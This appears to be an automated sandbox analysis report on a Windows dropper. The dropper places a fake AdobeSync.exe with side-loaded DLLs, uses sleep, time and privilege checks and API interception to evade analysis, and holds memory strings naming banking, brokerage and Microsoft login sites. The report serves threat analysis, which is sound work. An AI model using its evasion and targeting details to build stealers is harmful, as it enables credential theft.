Source: Binary string: mbols\ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2124211584.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2171269604.0000000002E24000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2123111825.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2170693552.0000000002E24000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2172330186.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2142328136.0000000002E24000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2184765975.0000000002E19000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: AXE8SharedExpat.pdb source: AdobeSync.exe, 00000003.00000002.1394420634.000000006D350000.00000002.00000001.01000000.00000009.sdmp, AdobeSync.exe, 00000004.00000002.1459930543.000000006D500000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: 4C:\Users\user\AppData\Roaming\com.adobe.dunamis_prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: BIB.pdb source: AdobeSync.exe, 00000003.00000003.1383616075.00000000012E0000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000002.1394339156.000000006D321000.00000002.00000001.01000000.0000000A.sdmp, AdobeSync.exe, 00000004.00000002.1459521925.000000006D491000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: AXE8SharedExpat.pdbppPm source: AdobeSync.exe, 00000004.00000002.1459930543.000000006D500000.00000002.00000001.01000000.0000000E.sdmp
Source: LVkAi4PBv6.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: LVkAi4PBv6.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: LVkAi4PBv6.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: LVkAi4PBv6.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: LVkAi4PBv6.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: LVkAi4PBv6.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x60e0b6
Source: eekxwchdkwfcah.5.dr Static PE information: real checksum: 0x27e8a5 should be: 0x27697f
Source: Quadruple.dll.2.dr Static PE information: real checksum: 0x4dc7e should be: 0x4a7b1
Source: bkpxojga.11.dr Static PE information: real checksum: 0x27e8a5 should be: 0x27697f
Source: AXE8SharedExpat.dll.3.dr Static PE information: real checksum: 0x32631 should be: 0x361f1
Source: LVkAi4PBv6.exe Static PE information: real checksum: 0x0 should be: 0x6bd43c
Source: AXE8SharedExpat.dll.2.dr Static PE information: real checksum: 0x32631 should be: 0x361f1
Source: LVkAi4PBv6.exe Static PE information: section name: .wixburn
Source: LVkAi4PBv6.exe.0.dr Static PE information: section name: .wixburn
Source: LocalCtrl_alpha_v3.exe.5.dr Static PE information: section name: Shared
Source: eekxwchdkwfcah.5.dr Static PE information: section name: .xdata
Source: eekxwchdkwfcah.5.dr Static PE information: section name: ubpux
Source: bkpxojga.11.dr Static PE information: section name: .xdata
Source: bkpxojga.11.dr Static PE information: section name: ubpux
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe Code function: 0_2_0088EAD6 push ecx; ret 0_2_0088EAE9
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Code function: 2_2_005EEAD6 push ecx; ret 2_2_005EEAE9
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Code function: 2_2_6D370FB4 push ecx; ret 2_2_6D370FC6
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe Code function: 3_2_00128249 push ecx; ret 3_2_0012825C
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe Code function: 3_2_00128B07 push ecx; ret 3_2_00128B1A
Source: msvcr90.dll.2.dr Static PE information: section name: .text entropy: 6.9217598022130655
Source: msvcr90.dll.3.dr Static PE information: section name: .text entropy: 6.9217598022130655
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe File created: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\msvcr90.dll
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe File created: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\sqlite.dll
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe File created: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe File created: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\msvcp90.dll
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe File created: C:\Users\user\AppData\Roaming\PatchReaderWCF\BIB.dll
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe File created: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\BIB.dll
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe File created: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AXE8SharedExpat.dll
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe File created: C:\Users\user\AppData\Roaming\PatchReaderWCF\msvcp90.dll
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe File created: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\eekxwchdkwfcah
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe File created: C:\Users\user\AppData\Roaming\PatchReaderWCF\AXE8SharedExpat.dll
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe File created: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\Quadruple.dll
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\bkpxojga
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe File created: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe File created: C:\Users\user\AppData\Roaming\PatchReaderWCF\msvcr90.dll
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe File created: C:\Users\user\AppData\Roaming\PatchReaderWCF\sqlite.dll

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\cmd.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\EEKXWCHDKWFCAH
Source: C:\Windows\SysWOW64\cmd.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\BKPXOJGA
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D36FBC5 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_6D36FBC5
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe API/Special instruction interceptor: Address: 6D557C44
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe API/Special instruction interceptor: Address: 6D557C44
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe API/Special instruction interceptor: Address: 6D557945
Source: C:\Windows\SysWOW64\cmd.exe API/Special instruction interceptor: Address: 6D553B54
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe API/Special instruction interceptor: Address: 6D4A7C44
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe API/Special instruction interceptor: Address: 6D4A7945
Source: C:\Windows\SysWOW64\cmd.exe API/Special instruction interceptor: Address: 6D4A3B54
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Dropped PE file which has not been started: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\msvcr90.dll
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Dropped PE file which has not been started: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\msvcp90.dll
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PatchReaderWCF\msvcp90.dll
Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\eekxwchdkwfcah
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Dropped PE file which has not been started: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\Quadruple.dll
Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bkpxojga
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PatchReaderWCF\msvcr90.dll
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Evaded block: after key decision
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeEvasive API call chain: GetLocalTime,DecisionNodes
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeAPI coverage: 9.6 %
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe TID: 1008Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 4008Thread sleep time: -150000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 6328Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 64Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_0089FEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 0089FF61h0_2_0089FEC6
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_0089FEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 0089FF5Ah0_2_0089FEC6
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005FFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 005FFF61h2_2_005FFEC6
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005FFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 005FFF5Ah2_2_005FFEC6
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_00863CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,0_2_00863CC4
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_008A4440 FindFirstFileW,FindClose,0_2_008A4440
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_00897B87 FindFirstFileExW,0_2_00897B87
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_00879B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,0_2_00879B43
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_00604440 FindFirstFileW,FindClose,2_2_00604440
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005D9B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,2_2_005D9B43
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005F7B87 FindFirstFileExW,2_2_005F7B87
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005C3CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,2_2_005C3CC4
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D36DCB0 GetWindowsDirectoryW,lstrcmpW,lstrlenW,lstrlenW,FindFirstFileW,lstrlenW,DeleteFileW,FindNextFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_6D36DCB0
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D37DB36 FindFirstFileExW,2_2_6D37DB36
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeCode function: 3_2_000BCE10 FindFirstFileW,3_2_000BCE10
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeCode function: 3_2_000BBB70 FindFirstFileW,GetFullPathNameW,GetLastError,FindFirstFileW,GetLastError,FindClose,_CxxThrowException,3_2_000BBB70
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_008A97A5 VirtualQuery,GetSystemInfo,0_2_008A97A5
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2170307750.0000000000642000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2143180060.0000000000642000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2152916730.0000000000642000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2161763361.0000000000642000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2182937317.0000000000642000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2206867453.0000000000642000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1807247260.0000000000642000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1799166983.0000000000642000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1790141711.0000000000642000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2181693786.0000000000642000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
Source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2161763361.000000000062E000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2182937317.000000000062E000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1790141711.0000000000634000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2152916730.000000000062E000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2170307750.000000000062E000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1807247260.0000000000634000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2129287330.000000000062E000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1799166983.0000000000634000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2206867453.000000000062E000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2143180060.000000000062E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW]
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
Source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
Source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2206867453.00000000005CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_0088E88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0088E88A
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeCode function: 3_2_00061412 OutputDebugStringA,GetLastError,3_2_00061412
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_008948D8 mov eax, dword ptr fs:[00000030h]0_2_008948D8
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005F48D8 mov eax, dword ptr fs:[00000030h]2_2_005F48D8
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D37D82F mov eax, dword ptr fs:[00000030h]2_2_6D37D82F
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D3772E9 mov eax, dword ptr fs:[00000030h]2_2_6D3772E9
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_0086394F GetProcessHeap,RtlAllocateHeap,0_2_0086394F
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_0088E3D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0088E3D8
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_0088E9DC SetUnhandledExceptionFilter,0_2_0088E9DC
